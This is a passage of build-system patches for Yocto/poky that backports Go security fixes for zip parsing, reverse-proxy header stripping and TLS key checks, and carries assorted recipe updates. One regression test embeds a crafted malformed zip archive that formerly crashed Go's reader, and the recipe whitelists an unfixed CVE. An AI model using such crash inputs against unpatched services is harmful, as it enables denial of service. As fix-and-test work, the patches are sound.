= "1" diff --git a/poky/meta/recipes-devtools/go/go-1.14.inc b/poky/meta/recipes-devtools/go/go-1.14.inc index 3dfd671d11..abc6f42184 100644 --- a/poky/meta/recipes-devtools/go/go-1.14.inc +++ b/poky/meta/recipes-devtools/go/go-1.14.inc @@ -16,6 +16,15 @@ SRC_URI += "\ file://0006-cmd-dist-separate-host-and-target-builds.patch \ file://0007-cmd-go-make-GOROOT-precious-by-default.patch \ file://0008-use-GOBUILDMODE-to-set-buildmode.patch \ + file://CVE-2021-34558.patch \ + file://CVE-2021-33196.patch \ + file://CVE-2021-33197.patch \ " SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch" SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149" + +# Upstream don't believe it is a signifiant real world issue and will only +# fix in 1.17 onwards where we can drop this. +# https://github.com/golang/go/issues/30999#issuecomment-910470358 +CVE_CHECK_WHITELIST += "CVE-2021-29923" + diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch new file mode 100644 index 0000000000..2e2dc62c49 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch @@ -0,0 +1,124 @@ +From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001 +From: Roland Shoemaker <roland@golang.org> +Date: Tue, 11 May 2021 11:31:31 -0700 +Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized + +Since the number of files in the EOCD record isn't validated, it isn't +safe to preallocate Reader.Files using that field. A malformed archive +can indicate it contains up to 1 << 128 - 1 files. We can still safely +preallocate the slice by checking if the specified number of files in +the archive is reasonable, given the size of the archive. + +Thanks to the OSS-Fuzz project for discovering this issue and to +Emmanuel Odeke for reporting it. + +Fixes #46242 +Fixes CVE-2021-33196 + +Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76 +Reviewed-on: https://go-review.googlesource.com/c/go/+/318909 +Trust: Roland Shoemaker <roland@golang.org> +Trust: Katie Hockman <katie@golang.org> +Trust: Joe Tsai <thebrokentoaster@gmail.com> +Run-TryBot: Roland Shoemaker <roland@golang.org> +TryBot-Result: Go Bot <gobot@golang.org> +Reviewed-by: Katie Hockman <katie@golang.org> +Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com> + +Upstream-Status: Backport +CVE: CVE-2021-33196 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/archive/zip/reader.go | 10 +++++- + src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++ + 2 files changed, 68 insertions(+), 1 deletion(-) + +Index: go/src/archive/zip/reader.go +=================================================================== +--- go.orig/src/archive/zip/reader.go ++++ go/src/archive/zip/reader.go +@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz + return err + } + z.r = r +- z.File = make([]*File, 0, end.directoryRecords) ++ // Since the number of directory records is not validated, it is not ++ // safe to preallocate z.File without first checking that the specified ++ // number of files is reasonable, since a malformed archive may ++ // indicate it contains up to 1 << 128 - 1 files. Since each file has a ++ // header which will be _at least_ 30 bytes we can safely preallocate ++ // if (data size / 30) >= end.directoryRecords. ++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords { ++ z.File = make([]*File, 0, end.directoryRecords) ++ } + z.Comment = end.comment + rs := io.NewSectionReader(r, 0, size) + if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil { +Index: go/src/archive/zip/reader_test.go +=================================================================== +--- go.orig/src/archive/zip/reader_test.go ++++ go/src/archive/zip/reader_test.go +@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) { + t.Errorf("Error reading the archive: %v", err) + } + } ++ ++func TestCVE202133196(t *testing.T) { ++ // Archive that indicates it has 1 << 128 -1 files, ++ // this would previously cause a panic due to attempting ++ // to allocate a slice with 1 << 128 -1 elements. ++ data := []byte{ ++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08, ++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02, ++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00, ++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20, ++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00, ++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00, ++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, ++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00, ++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50, ++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff, ++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, ++ 0xff, 0xff, 0xff, 0x00, 0x00, ++ } ++ _, err := NewReader(bytes.NewReader(data), int64(len(data))) ++ if err != ErrFormat { ++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat) ++ } ++ ++ // Also check that an archive containing a handful of empty ++ // files doesn't cause an issue ++ b := bytes.NewBuffer(nil) ++ w := NewWriter(b) ++ for i := 0; i < 5; i++ { ++ _, err := w.Create("") ++ if err != nil { ++ t.Fatalf("Writer.Create failed: %s", err) ++ } ++ } ++ if err := w.Close(); err != nil { ++ t.Fatalf("Writer.Close failed: %s", err) ++ } ++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len())) ++ if err != nil { ++ t.Fatalf("NewReader failed: %s", err) ++ } ++ if len(r.File) != 5 { ++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File)) ++ } ++} diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch new file mode 100644 index 0000000000..2052b1d3db --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch @@ -0,0 +1,152 @@ +From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001 +From: Filippo Valsorda <filippo@golang.org> +Date: Fri, 21 May 2021 14:02:30 -0400 +Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove + hop-by-hop headers + +Previously, we'd fail to remove the Connection header from a request +like this: + + Connection: + Connection: x-header + +Updates #46313 +Fixes #46314 +Fixes CVE-2021-33197 + +Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d +Reviewed-on: https://go-review.googlesource.com/c/go/+/321929 +Run-TryBot: Filippo Valsorda <filippo@golang.org> +Reviewed-by: Katie Hockman <katie@golang.org> +Trust: Katie Hockman <katie@golang.org> +Trust: Filippo Valsorda <filippo@golang.org> +TryBot-Result: Go Bot <gobot@golang.org> +Reviewed-on: https://go-review.googlesource.com/c/go/+/323091 +Run-TryBot: Katie Hockman <katie@golang.org> + +Upstream-Status: Backport +CVE: CVE-2021-33197 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/net/http/httputil/reverseproxy.go | 22 ++++---- + src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++- + 2 files changed, 70 insertions(+), 15 deletions(-) + +Index: go/src/net/http/httputil/reverseproxy.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy.go ++++ go/src/net/http/httputil/reverseproxy.go +@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http + // important is "Connection" because we want a persistent + // connection, regardless of what the client sent to us. + for _, h := range hopHeaders { +- hv := outreq.Header.Get(h) +- if hv == "" { +- continue +- } +- if h == "Te" && hv == "trailers" { +- // Issue 21096: tell backend applications that +- // care about trailer support that we support +- // trailers. (We do, but we don't go out of +- // our way to advertise that unless the +- // incoming client request thought it was +- // worth mentioning) +- continue +- } + outreq.Header.Del(h) + } + ++ // Issue 21096: tell backend applications that care about trailer support ++ // that we support trailers. (We do, but we don't go out of our way to ++ // advertise that unless the incoming client request thought it was worth ++ // mentioning.) Note that we look at req.Header, not outreq.Header, since ++ // the latter has passed through removeConnectionHeaders. ++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") { ++ outreq.Header.Set("Te", "trailers") ++ } ++ + // After stripping all the hop-by-hop connection headers above, add back any + // necessary for protocol upgrades, such as for websockets. + if reqUpType != "" { +Index: go/src/net/http/httputil/reverseproxy_test.go +=================================================================== +--- go.orig/src/net/http/httputil/reverseproxy_test.go ++++ go/src/net/http/httputil/reverseproxy_test.go +@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) { + + getReq, _ := http.NewRequest("GET", frontend.URL, nil) + getReq.Host = "some-name" +- getReq.Header.Set("Connection", "close") +- getReq.Header.Set("Te", "trailers") ++ getReq.Header.Set("Connection", "close, TE") ++ getReq.Header.Add("Te", "foo") ++ getReq.Header.Add("Te", "bar, trailers") + getReq.Header.Set("Proxy-Connection", "should be deleted") + getReq.Header.Set("Upgrade", "foo") + getReq.Close = true +@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent + } + } + ++func TestReverseProxyStripEmptyConnection(t *testing.T) { ++ // See Issue 46313. ++ const backendResponse = "I am the backend" ++ ++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header ++ // in the Request's Connection header. ++ const someConnHeader = "X-Some-Conn-Header" ++ ++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ if c := r.Header.Values("Connection"); len(c) != 0 { ++ t.Errorf("handler got header %q = %v; want empty", "Connection", c) ++ } ++ if c := r.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++ w.Header().Add("Connection", "") ++ w.Header().Add("Connection", someConnHeader) ++ w.Header().Set(someConnHeader, "should be deleted") ++ io.WriteString(w, backendResponse) ++ })) ++ defer backend.Close() ++ backendURL, err := url.Parse(backend.URL) ++ if err != nil { ++ t.Fatal(err) ++ } ++ proxyHandler := NewSingleHostReverseProxy(backendURL) ++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { ++ proxyHandler.ServeHTTP(w, r) ++ if c := r.Header.Get(someConnHeader); c != "should be deleted" { ++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted") ++ } ++ })) ++ defer frontend.Close() ++ ++ getReq, _ := http.NewRequest("GET", frontend.URL, nil) ++ getReq.Header.Add("Connection", "") ++ getReq.Header.Add("Connection", someConnHeader) ++ getReq.Header.Set(someConnHeader, "should be deleted") ++ res, err := frontend.Client().Do(getReq) ++ if err != nil { ++ t.Fatalf("Get: %v", err) ++ } ++ defer res.Body.Close() ++ bodyBytes, err := ioutil.ReadAll(res.Body) ++ if err != nil { ++ t.Fatalf("reading body: %v", err) ++ } ++ if got, want := string(bodyBytes), backendResponse; got != want { ++ t.Errorf("got body %q; want %q", got, want) ++ } ++ if c := res.Header.Get("Connection"); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", "Connection", c) ++ } ++ if c := res.Header.Get(someConnHeader); c != "" { ++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c) ++ } ++} ++ + func TestXForwardedFor(t *testing.T) { + const prevForwardedFor = "client ip" + const backendResponse = "I am the backend" diff --git a/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch new file mode 100644 index 0000000000..8fb346d622 --- /dev/null +++ b/poky/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch @@ -0,0 +1,51 @@ +From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001 +From: Roland Shoemaker <roland@golang.org> +Date: Wed, 9 Jun 2021 11:31:27 -0700 +Subject: [PATCH] crypto/tls: test key type when casting + +When casting the certificate public key in generateClientKeyExchange, +check the type is appropriate. This prevents a panic when a server +agrees to a RSA based key exchange, but then sends an ECDSA (or +other) certificate. + +Fixes #47143 +Fixes CVE-2021-34558 + +Thanks to Imre Rad for reporting this issue. + +Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea +Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723 +Reviewed-by: Filippo Valsorda <valsorda@google.com> +Reviewed-by: Katie Hockman <katiehockman@google.com> +Reviewed-on: https://go-review.googlesource.com/c/go/+/334031 +Trust: Filippo Valsorda <filippo@golang.org> +Run-TryBot: Filippo Valsorda <filippo@golang.org> +TryBot-Result: Go Bot <gobot@golang.org> +Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org> + +Upstream-Status: Backport +https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557 +CVE: CVE-2021-34558 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + src/crypto/tls/key_agreement.go | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +Index: go/src/crypto/tls/key_agreement.go +=================================================================== +--- go.orig/src/crypto/tls/key_agreement.go ++++ go/src/crypto/tls/key_agreement.go +@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient + return nil, nil, err + } + +- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret) ++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey) ++ if !ok { ++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite") ++ } ++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret) + if err != nil { + return nil, nil, err + } diff --git a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb index 0da2c6607c..e29e53433e 100644 --- a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb +++ b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb @@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d" GO_IMPORT = "github.com/golang/dep" -SRC_URI = "git://${GO_IMPORT} \ +SRC_URI = "git://${GO_IMPORT};branch=master \ file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \ file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \ " diff --git a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb index 58d2dee897..d9e712f74a 100644 --- a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb +++ b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb @@ -4,7 +4,7 @@ DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pu LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/rpm-software-management/libcomps.git \ +SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \ file://0001-Add-crc32.c-to-sources-list.patch \ file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ " diff --git a/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch new file mode 100644 index 0000000000..61d255581b --- /dev/null +++ b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch @@ -0,0 +1,58 @@ +From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001 +From: Jaroslav Mracek <jmracek@redhat.com> +Date: Tue, 3 Sep 2019 11:01:23 +0200 +Subject: [PATCH] Mark job goal.upgrade with sltr as targeted + +It allows to keep installed packages in upgrade set. + +It also prevents from reinstalling of modified packages with same NEVRA. + + +Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from +https://github.com/rpm-software-management/libdnf + +This bug is present in oe-core's dnf + +Remove changes to spec file from upstream + +Upstream-Status: Backport +Signed-off-by: Jate Sujjavanich <jatedev@gmail.com> +--- + libdnf.spec | 4 ++-- + libdnf/goal/Goal.cpp | 2 +- + libdnf/goal/Goal.hpp | 6 ++++-- + 3 files changed, 7 insertions(+), 5 deletions(-) + +diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp +index b69be19..a38cbb4 100644 +--- a/libdnf/goal/Goal.cpp ++++ b/libdnf/goal/Goal.cpp +@@ -767,7 +767,7 @@ void + Goal::upgrade(HySelector sltr) + { + pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE); +- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE); ++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED); + } + + void +diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp +index f33dfa2..d701317 100644 +--- a/libdnf/goal/Goal.hpp ++++ b/libdnf/goal/Goal.hpp +@@ -86,8 +86,10 @@ public: + /** + * @brief If selector ill formed, it rises std::runtime_error() + * +- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to +- * reinstall installonly packages. ++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed ++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo ++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all ++ * installed and available packages of the foo must be in selector plus obsoletes of foo. + */ + void upgrade(HySelector sltr); + void userInstalled(DnfPackage *pkg); +-- +2.7.4 + diff --git a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb index cc7f2be564..39858ad401 100644 --- a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb +++ b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb @@ -4,13 +4,14 @@ DESCRIPTION = "This library provides a high level package-manager. It's core lib LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://github.com/rpm-software-management/libdnf \ +SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \ file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \ file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \ file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \ file://0001-Add-WITH_TESTS-option.patch \ file://0001-include-stdexcept-for-runtime_error.patch \ file://fix-deprecation-warning.patch \ + file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \ " SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77" diff --git a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb index a299514340..73a58f75e3 100644 --- a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb +++ b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb @@ -5,7 +5,7 @@ DESCRIPTION = "${SUMMARY}" LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://github.com/rpm-software-management/librepo.git \ +SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \ file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \ file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \ file://CVE-2020-14352.patch \ diff --git a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc index e9225e140c..c8744e6d5f 100644 --- a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc +++ b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc @@ -23,6 +23,8 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \ file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \ file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \ file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \ + file://lto-prefix.patch \ + file://debian-no_hostname.patch \ " SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e" diff --git a/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch new file mode 100644 index 0000000000..2bd010b8e4 --- /dev/null +++ b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch @@ -0,0 +1,22 @@ +If lto is enabled, we need the prefix-map variables to be passed to the linker. +Add these to the list of options libtool passes through. + +Upstream-Status: Pending +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Index: libtool-2.4.6/build-aux/ltmain.in +=================================================================== +--- libtool-2.4.6.orig/build-aux/ltmain.in ++++ libtool-2.4.6/build-aux/ltmain.in +@@ -5424,9 +5424,10 @@ func_mode_link () + # --sysroot=* for sysroot support + # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization + # -stdlib=* select c++ std lib with clang ++ # -f*-prefix-map* needed for lto linking + -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \ + -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \ +- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*) ++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*) + func_quote_for_eval "$arg" + arg=$func_quote_for_eval_result + func_append compile_command " $arg" diff --git a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb index a5715faaa9..f5fdd00e5e 100644 --- a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb +++ b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb @@ -1,6 +1,6 @@ require libtool-${PV}.inc -SRC_URI += "file://multilib.patch file://debian-no_hostname.patch" +SRC_URI += "file://multilib.patch" RDEPENDS_${PN} += "bash" diff --git a/poky/meta/recipes-devtools/llvm/llvm_git.bb b/poky/meta/recipes-devtools/llvm/llvm_git.bb index 534e2c685f..de92cef1a4 100644 --- a/poky/meta/recipes-devtools/llvm/llvm_git.bb +++ b/poky/meta/recipes-devtools/llvm/llvm_git.bb @@ -30,7 +30,7 @@ LLVM_DIR = "llvm${LLVM_RELEASE}" BRANCH = "release/${MAJOR_VERSION}.x" SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05" -SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \ +SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \ file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \ file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \ file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \ diff --git a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc index a9b63c1bf6..6475b02f8b 100644 --- a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc +++ b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc @@ -9,6 +9,7 @@ inherit autotools texinfo ptest SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \ file://ac_config_links.patch \ file://m4-1.4.18-glibc-change-work-around.patch \ + file://0001-c-stack-stop-using-SIGSTKSZ.patch \ " SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://run-ptest \ diff --git a/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch new file mode 100644 index 0000000000..883b8a2075 --- /dev/null +++ b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch @@ -0,0 +1,84 @@ +From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Fri, 30 Apr 2021 17:40:36 -0700 +Subject: [PATCH] c-stack: stop using SIGSTKSZ + +This patch is required with glibc 2.34+ +based on gnulib [1] + +[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b + +Upstream-Status: Pending +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + lib/c-stack.c | 22 +++++++++++++--------- + 1 file changed, 13 insertions(+), 9 deletions(-) + +diff --git a/lib/c-stack.c b/lib/c-stack.c +index 5353c08..863f764 100644 +--- a/lib/c-stack.c ++++ b/lib/c-stack.c +@@ -51,13 +51,14 @@ + typedef struct sigaltstack stack_t; + #endif + #ifndef SIGSTKSZ +-# define SIGSTKSZ 16384 +-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384 ++#define get_sigstksz() (16384) ++#elif HAVE_LIBSIGSEGV + /* libsigsegv 2.6 through 2.8 have a bug where some architectures use + more than the Linux default of an 8k alternate stack when deciding + if a fault was caused by stack overflow. */ +-# undef SIGSTKSZ +-# define SIGSTKSZ 16384 ++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ)) ++#else ++#define get_sigstksz() ((SIGSTKSZ)) + #endif + + #include <stdlib.h> +@@ -131,7 +132,8 @@ die (int signo) + /* Storage for the alternate signal stack. */ + static union + { +- char buffer[SIGSTKSZ]; ++ /* allocate buffer with size from get_sigstksz() */ ++ char *buffer; + + /* These other members are for proper alignment. There's no + standard way to guarantee stack alignment, but this seems enough +@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int)) + program_error_message = _("program error"); + stack_overflow_message = _("stack overflow"); + ++ alternate_signal_stack.buffer = malloc(get_sigstksz()); + /* Always install the overflow handler. */ + if (stackoverflow_install_handler (overflow_handler, + alternate_signal_stack.buffer, +- sizeof alternate_signal_stack.buffer)) ++ get_sigstksz())) + { + errno = ENOTSUP; + return -1; +@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int)) + stack_t st; + struct sigaction act; + st.ss_flags = 0; ++ alternate_signal_stack.buffer = malloc(get_sigstksz()); + # if SIGALTSTACK_SS_REVERSED + /* Irix mistakenly treats ss_sp as the upper bound, rather than + lower bound, of the alternate stack. */ +- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *); +- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *); ++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *); ++ st.ss_size = get_sigstksz() - sizeof (void *); + # else + st.ss_sp = alternate_signal_stack.buffer; +- st.ss_size = sizeof alternate_signal_stack.buffer; ++ st.ss_size = get_sigstksz(); + # endif + r = sigaltstack (&st, NULL); + if (r != 0) +-- +2.31.1 + diff --git a/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch new file mode 100644 index 0000000000..f96cc7d302 --- /dev/null +++ b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch @@ -0,0 +1,431 @@ +From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001 +From: Andrej Valek <andrej.valek@siemens.com> +Date: Mon, 23 Aug 2021 12:45:11 +0200 +Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for + C++ 17 + +Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2] + +based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html + +Signed-off-by: Andrej Valek <andrej.valek@siemens.com> +--- + src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++--------------------- + src/mklibs-readelf/elf.hpp | 18 ++++++++-------- + src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++---------------- + 3 files changed, 51 insertions(+), 51 deletions(-) + +diff --git 